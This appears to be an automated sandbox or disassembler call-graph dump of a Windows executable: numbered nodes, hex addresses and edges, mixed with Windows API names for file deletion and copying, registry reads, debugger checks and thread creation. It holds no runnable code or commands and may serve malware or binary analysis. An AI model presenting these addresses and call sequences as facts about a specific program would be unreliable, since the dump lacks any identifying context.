89 API calls 4 library calls 99253->99387 99353 7794e0 99254->99353 99256 779a28 99256->99201 99258 7b2478 99258->99258 99260 779cb5 99259->99260 99261 7b247d 99260->99261 99263 779d1f 99260->99263 99274 779d79 99260->99274 99262 7753b0 299 API calls 99261->99262 99264 7b2492 99262->99264 99267 781207 59 API calls 99263->99267 99263->99274 99288 779f50 Mailbox 99264->99288 99397 7da48d 89 API calls 4 library calls 99264->99397 99265 781207 59 API calls 99265->99274 99268 7b24d8 99267->99268 99271 792f70 __cinit 67 API calls 99268->99271 99269 792f70 __cinit 67 API calls 99269->99274 99270 7b24fa 99270->99201 99271->99274 99272 7739be 68 API calls 99272->99288 99273 7753b0 299 API calls 99273->99288 99274->99265 99274->99269 99274->99270 99276 779f3a 99274->99276 99274->99288 99276->99288 99398 7da48d 89 API calls 4 library calls 99276->99398 99277 774230 59 API calls 99277->99288 99281 77a775 99402 7da48d 89 API calls 4 library calls 99281->99402 99282 7b27f9 99282->99201 99284 7da48d 89 API calls 99284->99288 99288->99272 99288->99273 99288->99277 99288->99281 99288->99284 99289 77a058 99288->99289 99396 781bcc 59 API calls 2 library calls 99288->99396 99399 7c7aad 59 API calls 99288->99399 99400 7eccac 299 API calls 99288->99400 99401 7ebc26 299 API calls Mailbox 99288->99401 99403 775190 59 API calls Mailbox 99288->99403 99404 7e9ab0 299 API calls Mailbox 99288->99404 99289->99201 99291 774d37 84 API calls 99290->99291 99292 7dc286 99291->99292 99405 7d4005 99292->99405 99294 7dc28e 99295 7dc292 GetLastError 99294->99295 99296 7dc2a7 99294->99296 99295->99296 99296->99201 99298 7dbcf5 99297->99298 99299 7dbdbb Mailbox 99297->99299 99300 77502b 59 API calls 99298->99300 99301 774d37 84 API calls 99299->99301 99325 7dbdc3 Mailbox 99299->99325 99303 7dbd00 99300->99303 99302 7dbdf3 99301->99302 99304 774d37 84 API calls 99302->99304 99305 77502b 59 API calls 99303->99305 99306 7dbe05 99304->99306 99307 7dbd14 99305->99307 99443 7d3ce2 99306->99443 99307->99299 99309 781207 59 API calls 99307->99309 99310 7dbd25 99309->99310 99311 781207 59 API calls 99310->99311 99312 7dbd2e 99311->99312 99313 774d37 84 API calls 99312->99313 99314 7dbd3b 99313->99314 99315 790119 59 API calls 99314->99315 99316 7dbd4e 99315->99316 99317 7817e0 59 API calls 99316->99317 99318 7dbd5f 99317->99318 99319 7d412a 3 API calls 99318->99319 99326 7dbd88 Mailbox 99318->99326 99321 7dbd6e 99319->99321 99320 77502b 59 API calls 99320->99299 99322 781a36 59 API calls 99321->99322 99321->99326 99323 7dbd7f 99322->99323 99324 7d3f1d 63 API calls 99323->99324 99324->99326 99325->99201 99326->99320 99556 7df87d 99327->99556 99329 7de4b0 99329->99201 99330->99148 99331->99153 99332->99201 99333->99154 99334->99154 99335->99154 99336->99201 99337->99201 99338->99201 99339->99201 99340->99201 99341->99201 99342->99191 99343->99191 99344->99191 99345->99191 99346->99191 99347->99191 99349 7735e2 99348->99349 99351 7735b0 99348->99351 99349->99246 99350 7735d5 IsDialogMessageW 99350->99349 99350->99351 99351->99349 99351->99350 99352 7ad273 GetClassLongW 99351->99352 99352->99350 99352->99351 99354 7753b0 299 API calls 99353->99354 99355 77951f 99354->99355 99356 779527 _memmove 99355->99356 99357 7b2001 99355->99357 99359 779944 99356->99359 99362 779583 99356->99362 99363 790fe6 59 API calls Mailbox 99356->99363 99370 7b22c0 99356->99370 99371 7796cf 99356->99371 99385 779741 99356->99385 99389 775190 59 API calls Mailbox 99357->99389 99367 790fe6 Mailbox 59 API calls 99359->99367 99361 7b22de 99361->99361 99362->99256 99363->99356 99364 77986a 99365 77987f 99364->99365 99366 7b22b1 99364->99366 99368 790fe6 Mailbox 59 API calls 99365->99368 99394 7ea983 59 API calls 99366->99394 99377 7796e3 _memmove 99367->99377 99380 77977d 99368->99380 99395 7da48d 89 API calls 4 library calls 99370->99395 99371->99359 99373 7796dc 99371->99373 99372 790fe6 Mailbox 59 API calls 99376 77970e 99372->99376 99375 790fe6 Mailbox 59 API calls 99373->99375 99374 7b22a0 99393 7da48d 89 API calls 4 library calls 99374->99393 99375->99377 99376->99385 99388 77cca0 299 API calls 99376->99388 99377->99372 99377->99376 99377->99385 99380->99256 99382 7b2278 99392 7da48d 89 API calls 4 library calls 99382->99392 99384 7b2253 99391 7da48d 89 API calls 4 library calls 99384->99391 99385->99364 99385->99374 99385->99380 99385->99382 99385->99384 99390 778180 299 API calls 99385->99390 99387->99258 99388->99385 99389->99359 99390->99385 99391->99380 99392->99380 99393->99380 99394->99370 99395->99361 99396->99288 99397->99288 99398->99288 99399->99288 99400->99288 99401->99288 99402->99282 99403->99288 99404->99288 99406 781207 59 API calls 99405->99406 99407 7d4024 99406->99407 99408 781207 59 API calls 99407->99408 99409 7d402d 99408->99409 99410 781207 59 API calls 99409->99410 99411 7d4036 99410->99411 99429 790284 99411->99429 99416 7d405c 99417 790119 59 API calls 99416->99417 99419 7d4070 FindFirstFileW 99417->99419 99418 781900 59 API calls 99418->99416 99420 7d40fc FindClose 99419->99420 99424 7d408f 99419->99424 99423 7d4107 Mailbox 99420->99423 99421 7d40d7 FindNextFileW 99421->99424 99422 781c9c 59 API calls 99422->99424 99423->99294 99424->99420 99424->99421 99424->99422 99425 7817e0 59 API calls 99424->99425 99426 781900 59 API calls 99424->99426 99425->99424 99427 7d40c8 DeleteFileW 99426->99427 99427->99421 99428 7d40f3 FindClose 99427->99428 99428->99423 99441 7a1b70 99429->99441 99432 7902cd 99435 7819e1 59 API calls 99432->99435 99433 7902b0 99434 781821 59 API calls 99433->99434 99436 7902bc 99434->99436 99435->99436 99437 78133d 59 API calls 99436->99437 99438 7902c8 99437->99438 99439 7d4fec GetFileAttributesW 99438->99439 99440 7d404a 99439->99440 99440->99416 99440->99418 99442 790291 GetFullPathNameW 99441->99442 99442->99432 99442->99433 99444 781207 59 API calls 99443->99444 99445 7d3cff 99444->99445 99446 781207 59 API calls 99445->99446 99447 7d3d07 99446->99447 99448 781207 59 API calls 99447->99448 99449 7d3d0f 99448->99449 99450 781207 59 API calls 99449->99450 99451 7d3d17 99450->99451 99452 790284 60 API calls 99451->99452 99453 7d3d21 99452->99453 99454 790284 60 API calls 99453->99454 99455 7d3d2b 99454->99455 99489 7d4f82 99455->99489 99457 7d3d36 99458 7d4fec GetFileAttributesW 99457->99458 99459 7d3d41 99458->99459 99460 7d3d53 99459->99460 99461 781900 59 API calls 99459->99461 99462 7d4fec GetFileAttributesW 99460->99462 99461->99460 99463 7d3d5b 99462->99463 99464 7d3d68 99463->99464 99465 781900 59 API calls 99463->99465 99466 781207 59 API calls 99464->99466 99465->99464 99467 7d3d70 99466->99467 99468 781207 59 API calls 99467->99468 99469 7d3d78 99468->99469 99470 790119 59 API calls 99469->99470 99471 7d3d89 FindFirstFileW 99470->99471 99472 7d3eb4 FindClose 99471->99472 99481 7d3dac Mailbox 99471->99481 99478 7d3ebe Mailbox 99472->99478 99473 7d3e88 FindNextFileW 99473->99481 99474 781a36 59 API calls 99474->99481 99476 781c9c 59 API calls 99476->99481 99477 7817e0 59 API calls 99477->99481 99478->99325 99479 781900 59 API calls 99479->99481 99480 7d412a 3 API calls 99480->99481 99481->99472 99481->99473 99481->99474 99481->99476 99481->99477 99481->99479 99481->99480 99482 7d3eab FindClose 99481->99482 99483 7d3e2a 99481->99483 99484 7d3ef7 CopyFileExW 99481->99484 99488 7d3e6b DeleteFileW 99481->99488 99500 7d4561 99481->99500 99482->99478 99485 78151f 61 API calls 99483->99485 99486 7d3e4e MoveFileW 99483->99486 99487 7d3e3e DeleteFileW 99483->99487 99484->99481 99485->99483 99486->99481 99487->99481 99488->99481 99490 781207 59 API calls 99489->99490 99491 7d4f97 99490->99491 99492 781207 59 API calls 99491->99492 99493 7d4f9f 99492->99493 99494 790119 59 API calls 99493->99494 99495 7d4fae 99494->99495 99496 790119 59 API calls 99495->99496 99497 7d4fbe 99496->99497 99498 78151f 61 API calls 99497->99498 99499 7d4fce Mailbox 99498->99499 99499->99457 99501 7d457d 99500->99501 99502 7d4590 99501->99502 99503 7d4582 99501->99503 99505 781207 59 API calls 99502->99505 99504 781c9c 59 API calls 99503->99504 99553 7d458b Mailbox 99504->99553 99506 7d4598 99505->99506 99507 781207 59 API calls 99506->99507 99508 7d45a0 99507->99508 99509 781207 59 API calls 99508->99509 99510 7d45ab 99509->99510 99511 781207 59 API calls 99510->99511 99512 7d45b3 99511->99512 99513 781207 59 API calls 99512->99513 99514 7d45bb 99513->99514 99515 781207 59 API calls 99514->99515 99516 7d45c3 99515->99516 99517 781207 59 API calls 99516->99517 99518 7d45cb 99517->99518 99519 781207 59 API calls 99518->99519 99520 7d45d3 99519->99520 99521 790119 59 API calls 99520->99521 99522 7d45ea 99521->99522 99523 790119 59 API calls 99522->99523 99524 7d4603 99523->99524 99525 781609 59 API calls 99524->99525 99526 7d460f 99525->99526 99527 7d4622 99526->99527 99528 781981 59 API calls 99526->99528 99529 781609 59 API calls 99527->99529 99528->99527 99530 7d462b 99529->99530 99531 7d463b 99530->99531 99532 781981 59 API calls 99530->99532 99533 781c9c 59 API calls 99531->99533 99532->99531 99534 7d4647 99533->99534 99535 7817e0 59 API calls 99534->99535 99536 7d4653 99535->99536 99554 7d4713 59 API calls 99536->99554 99538 7d4662 99555 7d4713 59 API calls 99538->99555 99540 7d4675 99541 781609 59 API calls 99540->99541 99542 7d467f 99541->99542 99543 7d4684 99542->99543 99544 7d4696 99542->99544 99546 781900 59 API calls 99543->99546 99545 781609 59 API calls 99544->99545 99547 7d469f 99545->99547 99548 7d4691 99546->99548 99549 7d46bd 99547->99549 99550 781900 59 API calls 99547->99550 99551 7817e0 59 API calls 99548->99551 99552 7817e0 59 API calls 99549->99552 99550->99548 99551->99549 99552->99553 99553->99481 99554->99538 99555->99540 99557 7df898 99556->99557 99558 7df8f2 99556->99558 99559 790fe6 Mailbox 59 API calls 99557->99559 99618 7dfbb7 59 API calls 99558->99618 99561 7df89f 99559->99561 99562 7df8ab 99561->99562 99616 783df7 60 API calls Mailbox 99561->99616 99564 774d37 84 API calls 99562->99564 99569 7df8bd 99564->99569 99565 7df9cb 99612 7d8cd0 99565->99612 99566 7df8ff 99566->99565 99567 7df8d9 99566->99567 99573 7df93f 99566->99573 99567->99329 99571 783e47 67 API calls 99569->99571 99570 7df9d2 99576 7d394d 3 API calls 99570->99576 99572 7df8c9 99571->99572 99572->99566 99574 7df8cd 99572->99574 99575 774d37 84 API calls 99573->99575 99574->99567 99617 783f0b CloseHandle 99574->99617 99581 7df946 99575->99581 99592 7df9ae Mailbox 99576->99592 99578 7df9c1 99593 7d399c 99578->99593 99579 7df97a 99582 78162d 59 API calls 99579->99582 99581->99578 99581->99579 99584 7df98a 99582->99584 99583 7842cf CloseHandle 99585 7dfa20 99583->99585 99586 781c9c 59 API calls 99584->99586 99585->99567 99619 783f0b CloseHandle 99585->99619 99587 7df994 99586->99587 99589 781900 59 API calls 99587->99589 99590 7df9a2 99589->99590 99591 7d399c 66 API calls 99590->99591 99591->99592 99592->99567 99592->99583 99594 7d39af 99593->99594 99595 7d3a15 99593->99595 99594->99595 99597 7d39b4 99594->99597 99596 7d394d 3 API calls 99595->99596 99598 7d39fd Mailbox 99596->99598 99599 7d3a09 99597->99599 99601 7d39be 99597->99601 99598->99592 99624 7d3a35 62 API calls Mailbox 99599->99624 99602 7d39de 99601->99602 99603 7d39c8 99601->99603 99604 7840cd 59 API calls 99602->99604 99605 7840cd 59 API calls 99603->99605 99606 7d39e6 99604->99606 99607 7d39d0 99605->99607 99623 7d38e0 61 API calls Mailbox 99606->99623 99609 78402a 61 API calls 99607->99609 99610 7d39dc 99609->99610 99620 7d397e 99610->99620 99613 7d8cd9 99612->99613 99615 7d8cde 99612->99615 99625 7d7d6e 61 API calls 2 library calls 99613->99625 99615->99570 99616->99562 99617->99567 99618->99566 99619->99567 99621 7d394d 3 API calls 99620->99621 99622 7d3990 99621->99622 99622->99598 99623->99610 99624->99598 99625->99615 99626->99238 99627->98518 99628 7b01f8 99629 7b01fa 99628->99629 99632 7d4d18 SHGetFolderPathW 99629->99632 99633 781821 59 API calls 99632->99633 99634 7b0203 99633->99634 99635 77107d 99640 782fc5 99635->99640 99637 77108c 99638 792f70 __cinit 67 API calls 99637->99638 99639 771096 99638->99639 99641 782fd5 __write_nolock 99640->99641 99642 781207 59 API calls 99641->99642 99643 78308b 99642->99643 99671 7900cf 99643->99671 99645 783094 99678 7908c1 99645->99678 99648 781900 59 API calls 99649 7830ad 99648->99649 99684 784c94 99649->99684 99652 781207 59 API calls 99653 7830c5 99652->99653 99654 7819e1 59 API calls 99653->99654 99655 7830ce RegOpenKeyExW 99654->99655 99656 7c01a3 RegQueryValueExW 99655->99656 99661 7830f0 Mailbox 99655->99661 99657 7c0235 RegCloseKey 99656->99657 99658 7c01c0 99656->99658 99657->99661 99670 7c0247 _wcscat Mailbox __wsetenvp 99657->99670 99659 790fe6 Mailbox 59 API calls 99658->99659 99660 7c01d9 99659->99660 99663 78433f 59 API calls 99660->99663 99661->99637 99662 781609 59 API calls 99662->99670 99664 7c01e4 RegQueryValueExW 99663->99664 99665 7c0201 99664->99665 99667 7c021b 99664->99667 99666 781821 59 API calls 99665->99666 99666->99667 99667->99657 99668 781a36 59 API calls 99668->99670 99669 784c94 59 API calls 99669->99670 99670->99661 99670->99662 99670->99668 99670->99669 99672 7a1b70 __write_nolock 99671->99672 99673 7900dc GetModuleFileNameW 99672->99673 99674 781a36 59 API calls 99673->99674 99675 790102 99674->99675 99676 790284 60 API calls 99675->99676 99677 79010c Mailbox 99676->99677 99677->99645 99679 7a1b70 __write_nolock 99678->99679 99680 7908ce GetFullPathNameW 99679->99680 99681 7908f0 99680->99681 99682 781821 59 API calls 99681->99682 99683 78309f 99682->99683 99683->99648 99685 784ca2 99684->99685 99689 784cc4 _memmove 99684->99689 99688 790fe6 Mailbox 59 API calls 99685->99688 99686 790fe6 Mailbox 59 API calls 99687 7830bc 99686->99687 99687->99652 99688->99689 99689->99686 99690 771066 99695 77aaaa 99690->99695 99692 77106c 99693 792f70 __cinit 67 API calls 99692->99693 99694 771076 99693->99694 99696 77aacb 99695->99696 99728 7902eb 99696->99728 99700 77ab12 99701 781207 59 API calls 99700->99701 99702 77ab1c 99701->99702 99703 781207 59 API calls 99702->99703 99704 77ab26 99703->99704 99705 781207 59 API calls 99704->99705 99706 77ab30 99705->99706 99707 781207 59 API calls 99706->99707 99708 77ab6e 99707->99708 99709 781207 59 API calls 99708->99709 99710 77ac39 99709->99710 99738 790588 99710->99738 99714 77ac6b 99715 781207 59 API calls 99714->99715 99716 77ac75 99715->99716 99766 78fe2b 99716->99766 99718 77acbc 99719 77accc GetStdHandle 99718->99719 99720 7b2f39 99719->99720 99721 77ad18 99719->99721 99720->99721 99722 7b2f42 99720->99722 99723 77ad20 OleInitialize 99721->99723 99773 7d70f3 64 API calls Mailbox 99722->99773 99723->99692 99725 7b2f49 99774 7d77c2 CreateThread 99725->99774 99727 7b2f55 CloseHandle 99727->99723 99775 7903c4 99728->99775 99731 7903c4 59 API calls 99732 79032d 99731->99732 99733 781207 59 API calls 99732->99733 99734 790339 99733->99734 99735 781821 59 API calls 99734->99735 99736 77aad1 99735->99736 99737 7907bb 6 API calls 99736->99737 99737->99700 99739 781207 59 API calls 99738->99739 99740 790598 99739->99740 99741 781207 59 API calls 99740->99741 99742 7905a0 99741->99742 99782 7810c3 99742->99782 99745 7810c3 59 API calls 99746 7905b0 99745->99746 99747 781207 59 API calls 99746->99747 99748 7905bb 99747->99748 99749 790fe6 Mailbox 59 API calls 99748->99749 99750 77ac43 99749->99750 99751 78ff4c 99750->99751 99752 78ff5a 99751->99752 99753 781207 59 API calls 99752->99753 99754 78ff65 99753->99754 99755 781207 59 API calls 99754->99755 99756 78ff70 99755->99756 99757 781207 59 API calls 99756->99757 99758 78ff7b 99757->99758 99759 781207 59 API calls 99758->99759 99760 78ff86 99759->99760 99761 7810c3 59 API calls 99760->99761 99762 78ff91 99761->99762 99763 790fe6 Mailbox 59 API calls 99762->99763 99764 78ff98 RegisterWindowMessageW 99763->99764 99764->99714 99767 7c620c 99766->99767 99768 78fe3b 99766->99768 99785 7da12a 59 API calls 99767->99785 99769 790fe6 Mailbox 59 API calls 99768->99769 99771 78fe43 99769->99771 99771->99718 99772 7c6217 99773->99725 99774->99727 99786 7d77a8 65 API calls 99774->99786 99776 781207 59 API calls 99775->99776 99777 7903cf 99776->99777 99778 781207 59 API calls 99777->99778 99779 7903d7 99778->99779 99780 781207 59 API calls 99779->99780 99781 790323 99780->99781 99781->99731 99783 781207 59 API calls 99782->99783 99784 7810cb 99783->99784 99784->99745 99785->99772 99787 7d92c8 99788 7d92db 99787->99788 99789 7d92d5 99787->99789 99790 7d92ec 99788->99790 99792 792f85 _free 58 API calls 99788->99792 99791 792f85 _free 58 API calls 99789->99791 99793 7d92fe 99790->99793 99794 792f85 _free 58 API calls 99790->99794 99791->99788 99792->99790 99794->99793 99795 776981 99802 77373a 99795->99802 99797 776997 99811 777b3f 99797->99811 99799 7769bf 99800 77584d 99799->99800 99823 7da48d 89 API calls 4 library calls 99799->99823 99803 773746 99802->99803 99804 773758 99802->99804 99824 77523c 59 API calls 99803->99824 99806 773787 99804->99806 99807 77375e 99804->99807 99825 77523c 59 API calls 99806->99825 99809 790fe6 Mailbox 59 API calls 99807->99809 99810 773750 99809->99810 99810->99797 99812 78162d 59 API calls 99811->99812 99813 777b64 _wcscmp 99812->99813 99814 781a36 59 API calls 99813->99814 99817 777b98 Mailbox 99813->99817 99815 7affad 99814->99815 99816 7817e0 59 API calls 99815->99816 99818 7affb8 99816->99818 99817->99799 99826 773938 68 API calls 99818->99826 99820 7affc9 99822 7affcd Mailbox 99820->99822 99827 77523c 59 API calls 99820->99827 99822->99799 99823->99800 99824->99810 99825->99810 99826->99820 99827->99822 99828 7ae463 99829 77373a 59 API calls 99828->99829 99830 7ae479 99829->99830 99831 7ae4fa 99830->99831 99832 7ae48f 99830->99832 99834 77b020 299 API calls 99831->99834 99840 775376 60 API calls 99832->99840 99839 7ae4ee Mailbox 99834->99839 99836 7ae4ce 99836->99839 99841 7d890a 59 API calls Mailbox 99836->99841 99838 7af046 Mailbox 99839->99838 99842 7da48d 89 API calls 4 library calls 99839->99842 99840->99836 99841->99839 99842->99838 99843 797e83 99844 797e8f __freefls@4 99843->99844 99880 79a038 GetStartupInfoW 99844->99880 99847 797e94 99882 798dac GetProcessHeap 99847->99882 99848 797eec 99849 797ef7 99848->99849 99965 797fd3 58 API calls 3 library calls 99848->99965 99883 799d16 99849->99883 99852 797efd 99853 797f08 __RTC_Initialize 99852->99853 99966 797fd3 58 API calls 3 library calls 99852->99966 99904 79d802 99853->99904 99856 797f17 99857 797f23 GetCommandLineW 99856->99857 99967 797fd3 58 API calls 3 library calls 99856->99967 99923 7a5153 GetEnvironmentStringsW 99857->99923 99860 797f22 99860->99857 99863 797f3d 99864 797f48 99863->99864 99968 7932e5 58 API calls 3 library calls 99863->99968 99933 7a4f88 99864->99933 99867 797f59 99947 79331f 99867->99947 99868 797f4e 99868->99867 99969 7932e5 58 API calls 3 library calls 99868->99969 99871 797f61 99872 797f6c __wwincmdln 99871->99872 99970 7932e5 58 API calls 3 library calls 99871->99970 99953 785f8b 99872->99953 99875 797f80 99876 797f8f 99875->99876 99971 793588 58 API calls _doexit 99875->99971 99972 793310 58 API calls _doexit 99876->99972 99879 797f94 __freefls@4 99881 79a04e 99880->99881 99881->99847 99882->99848 99973 7933b7 36 API calls 2 library calls 99883->99973 99885 799d1b 99974 799f6c InitializeCriticalSectionAndSpinCount __mtinitlocknum 99885->99974 99887 799d20 99888 799d24 99887->99888 99976 799fba TlsAlloc 99887->99976 99975 799d8c 61 API calls 2 library calls 99888->99975 99891 799d29 99891->99852 99892 799d36 99892->99888 99893 799d41 99892->99893 99977 798a05 99893->99977 99896 799d83 99985 799d8c 61 API calls 2 library calls 99896->99985 99899 799d62 99899->99896 99901 799d68 99899->99901 99900 799d88 99900->99852 99984 799c63 58 API calls 4 library calls 99901->99984 99903 799d70 GetCurrentThreadId 99903->99852 99905 79d80e __freefls@4 99904->99905 99906 799e3b __lock 58 API calls 99905->99906 99907 79d815 99906->99907 99908 798a05 __calloc_crt 58 API calls 99907->99908 99909 79d826 99908->99909 99910 79d891 GetStartupInfoW 99909->99910 99911 79d831 @_EH4_CallFilterFunc@8 __freefls@4 99909->99911 99916 79d8a6 99910->99916 99920 79d9d5 99910->99920 99911->99856 99912 79da9d 99999 79daad LeaveCriticalSection _doexit 99912->99999 99914 798a05 __calloc_crt 58 API calls 99914->99916 99915 79da22 GetStdHandle 99915->99920 99916->99914 99919 79d8f4 99916->99919 99916->99920 99917 79da35 GetFileType 99917->99920 99918 79d928 GetFileType 99918->99919 99919->99918 99919->99920 99997 79a05b InitializeCriticalSectionAndSpinCount 99919->99997 99920->99912 99920->99915 99920->99917 99998 79a05b InitializeCriticalSectionAndSpinCount 99920->99998 99924 797f33 99923->99924 99925 7a5164 99923->99925 99929 7a4d4b GetModuleFileNameW 99924->99929 100000 798a4d 58 API calls 2 library calls 99925->100000 99927 7a518a _memmove 99928 7a51a0 FreeEnvironmentStringsW 99927->99928 99928->99924 99930 7a4d7f _wparse_cmdline 99929->99930 99932 7a4dbf _wparse_cmdline 99930->99932 100001 798a4d 58 API calls 2 library calls 99930->100001 99932->99863 99934 7a4fa1 __wsetenvp 99933->99934 99938 7a4f99 99933->99938 99935 798a05 __calloc_crt 58 API calls 99934->99935 99943 7a4fca __wsetenvp 99935->99943 99936 7a5021 99937 792f85 _free 58 API calls 99936->99937 99937->99938 99938->99868 99939 798a05 __calloc_crt 58 API calls 99939->99943 99940 7a5046 99942 792f85 _free 58 API calls 99940->99942 99942->99938 99943->99936 99943->99938 99943->99939 99943->99940 99944 7a505d 99943->99944 100002 7a4837 58 API calls __controlfp_s 99943->100002 100003 798ff6 IsProcessorFeaturePresent 99944->100003 99946 7a5069 99946->99868 99949 79332b __IsNonwritableInCurrentImage 99947->99949 100026 79a701 99949->100026 99950 793349 __initterm_e 99951 792f70 __cinit 67 API calls 99950->99951 99952 793368 __cinit __IsNonwritableInCurrentImage 99950->99952 99951->99952 99952->99871 99954 785fa5 99953->99954 99964 786044 99953->99964 99955 785fdf IsThemeActive 99954->99955 100029 79359c 99955->100029 99959 78600b 100041 785f00 SystemParametersInfoW SystemParametersInfoW 99959->100041 99961 786017 100042 785240 99961->100042 99963 78601f SystemParametersInfoW 99963->99964 99964->99875 99965->99849 99966->99853 99967->99860 99971->99876 99972->99879 99973->99885 99974->99887 99975->99891 99976->99892 99979 798a0c 99977->99979 99980 798a47 99979->99980 99982 798a2a 99979->99982 99986 7a5426 99979->99986 99980->99896 99983 79a016 TlsSetValue 99980->99983 99982->99979 99982->99980 99994 79a362 Sleep 99982->99994 99983->99899 99984->99903 99985->99900 99987 7a5431 99986->99987 99992 7a544c 99986->99992 99988 7a543d 99987->99988 99987->99992 99995 798d58 58 API calls __getptd_noexit 99988->99995 99990 7a545c HeapAlloc 99991 7a5442 99990->99991 99990->99992 99991->99979 99992->99990 99992->99991 99996 7935d1 DecodePointer 99992->99996 99994->99982 99995->99991 99996->99992 99997->99919 99998->99920 99999->99911 100000->99927 100001->99932 100002->99943 100004 799001 100003->100004 100009 798e89 100004->100009 100008 79901c 100008->99946 100010 798ea3 _memset __call_reportfault 100009->100010 100011 798ec3 IsDebuggerPresent 100010->100011 100017 79a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 100011->100017 100014 798f87 __call_reportfault 100018 79c826 100014->100018 100015 798faa 100016 79a370 GetCurrentProcess TerminateProcess 100015->100016 100016->100008 100017->100014 100019 79c82e 100018->100019 100020 79c830 IsProcessorFeaturePresent 100018->100020 100019->100015 100022 7a5b3a 100020->100022 100025 7a5ae9 5 API calls 2 library calls 100022->100025 100024 7a5c1d 100024->100015 100025->100024 100027 79a704 EncodePointer 100026->100027 100027->100027 100028 79a71e 100027->100028 100028->99950 100030 799e3b __lock 58 API calls 100029->100030 100031 7935a7 DecodePointer EncodePointer 100030->100031 100094 799fa5 LeaveCriticalSection 100031->100094 100033 786004 100034 793604 100033->100034 100035 793628 100034->100035 100036 79360e 100034->100036 100035->99959 100036->100035 100095 798d58 58 API calls __getptd_noexit 100036->100095 100038 793618 100096 798fe6 9 API calls __controlfp_s 100038->100096 100040 793623 100040->99959 100041->99961 100043 78524d __write_nolock 100042->100043 100044 781207 59 API calls 100043->100044 100045 785258 GetCurrentDirectoryW 100044->100045 100097 784ec8 100045->100097 100047 78527e IsDebuggerPresent 100048 78528c 100047->100048 100049 7c0b21 MessageBoxA 100047->100049 100050 7c0b39 100048->100050 100051 7852a0 100048->100051 100049->100050 100205 78314d 59 API calls Mailbox 100050->100205 100165 7831bf 100051->100165 100054 7c0b49 100062 7c0b5f SetCurrentDirectoryW 100054->100062 100061 78536c Mailbox 100061->99963 100062->100061 100094->100033 100095->100038 100096->100040 100098 781207 59 API calls 100097->100098 100099 784ede 100098->100099 100207 785420 100099->100207 100101 784efc 100102 7819e1 59 API calls 100101->100102 100103 784f10 100102->100103 100104 781c9c 59 API calls 100103->100104 100105 784f1b 100104->100105 100221 77477a 100105->100221 100108 781a36 59 API calls 100109 784f34 100108->100109 100110 7739be 68 API calls 100109->100110 100111 784f44 Mailbox 100110->100111 100112 781a36 59 API calls 100111->100112 100113 784f68 100112->100113 100114 7739be 68 API calls 100113->100114 100115 784f77 Mailbox 100114->100115 100116 781207 59 API calls 100115->100116 100117 784f94 100116->100117 100224 7855bc 100117->100224 100120 79312d _W_store_winword 60 API calls 100121 784fae 100120->100121 100122 784fb8 100121->100122 100123 7c0a54 100121->100123 100125 79312d _W_store_winword 60 API calls 100122->100125 100124 7855bc 59 API calls 100123->100124 100126 7c0a68 100124->100126 100127 784fc3 100125->100127 100129 7855bc 59 API calls 100126->100129 100127->100126 100128 784fcd 100127->100128 100130 79312d _W_store_winword 60 API calls 100128->100130 100131 7c0a84 100129->100131 100132 784fd8 100130->100132 100134 7900cf 61 API calls 100131->100134 100132->100131 100133 784fe2 100132->100133 100135 79312d _W_store_winword 60 API calls 100133->100135 100136 7c0aa7 100134->100136 100137 784fed 100135->100137 100138 7855bc 59 API calls 100136->100138 100139 7c0ad0 100137->100139 100140 784ff7 100137->100140 100141 7c0ab3 100138->100141 100143 7855bc 59 API calls 100139->100143 100142 78501b 100140->100142 100145 781c9c 59 API calls 100140->100145 100144 781c9c 59 API calls 100141->100144 100149 7747be 59 API calls 100142->100149 100146 7c0aee 100143->100146 100147 7c0ac1 100144->100147 100148 78500e 100145->100148 100150 781c9c 59 API calls 100146->100150 100151 7855bc 59 API calls 100147->100151 100152 7855bc 59 API calls 100148->100152 100153 78502a 100149->100153 100154 7c0afc 100150->100154 100151->100139 100152->100142 100155 774540 59 API calls 100153->100155 100156 7855bc 59 API calls 100154->100156 100157 785038 100155->100157 100158 7c0b0b 100156->100158 100230 7743d0 100157->100230 100158->100158 100160 77477a 59 API calls 100162 785055 100160->100162 100161 7743d0 59 API calls 100161->100162 100162->100160 100162->100161 100163 7855bc 59 API calls 100162->100163 100164 78509b Mailbox 100162->100164 100163->100162 100164->100047 100166 7831cc __write_nolock 100165->100166 100167 7c0314 _memset 100166->100167 100168 7831e5 100166->100168 100170 7c0330 GetOpenFileNameW 100167->100170 100169 790284 60 API calls 100168->100169 100171 7831ee 100169->100171 100172 7c037f 100170->100172 100241 7909c5 100171->100241 100174 781821 59 API calls 100172->100174 100176 7c0394 100174->100176 100176->100176 100178 783203 100259 78278a 100178->100259 100205->100054 100208 78542d __write_nolock 100207->100208 100209 781821 59 API calls 100208->100209 100215 785590 Mailbox 100208->100215 100211 78545f 100209->100211 100210 781609 59 API calls 100210->100211 100211->100210 100220 785495 Mailbox 100211->100220 100212 781609 59 API calls 100212->100220 100213 785563 100214 781a36 59 API calls 100213->100214 100213->100215 100216 785584 100214->100216 100215->100101 100218 784c94 59 API calls 100216->100218 100217 781a36 59 API calls 100217->100220 100218->100215 100219 784c94 59 API calls 100219->100220 100220->100212 100220->100213 100220->100215 100220->100217 100220->100219 100222 790fe6 Mailbox 59 API calls 100221->100222 100223 774787 100222->100223 100223->100108 100225 7855df 100224->100225 100226 7855c6 100224->100226 100227 781821 59 API calls 100225->100227 100228 781c9c 59 API calls 100226->100228 100229 784fa0 100227->100229 100228->100229 100229->100120 100231 7ad6c9 100230->100231 100235 7743e7 100230->100235 100231->100235 100240 7740cb 59 API calls Mailbox 100231->100240 100233 774530 100239 77523c 59 API calls 100233->100239 100234 7744e8 100236 790fe6 Mailbox 59 API calls 100234->100236 100235->100233 100235->100234 100238 7744ef 100235->100238 100236->100238 100238->100162 100239->100238 100240->100235 100242 7a1b70 __write_nolock 100241->100242 100243 7909d2 GetLongPathNameW 100242->100243 100244 781821 59 API calls 100243->100244 100245 7831f7 100244->100245 100246 782f3d 100245->100246 100247 781207 59 API calls 100246->100247 100248 782f4f 100247->100248 100249 790284 60 API calls 100248->100249 100250 782f5a 100249->100250 100251 782f65 100250->100251 100256 7c0177 100250->100256 100252 784c94 59 API calls 100251->100252 100254 782f71 100252->100254 100253 78151f 61 API calls 100253->100256 100293 771307 100254->100293 100256->100253 100257 7c0191 100256->100257 100258 782f84 Mailbox 100258->100178 100299 7849c2 100259->100299 100294 771319 100293->100294 100298 771338 _memmove 100293->100298 100297 790fe6 Mailbox 59 API calls 100294->100297 100295 790fe6 Mailbox 59 API calls 100296 77134f 100295->100296 100296->100258 100297->100298 100298->100295 100483 784b29 100299->100483 100304 7849ed LoadLibraryExW 100493 784ade 100304->100493 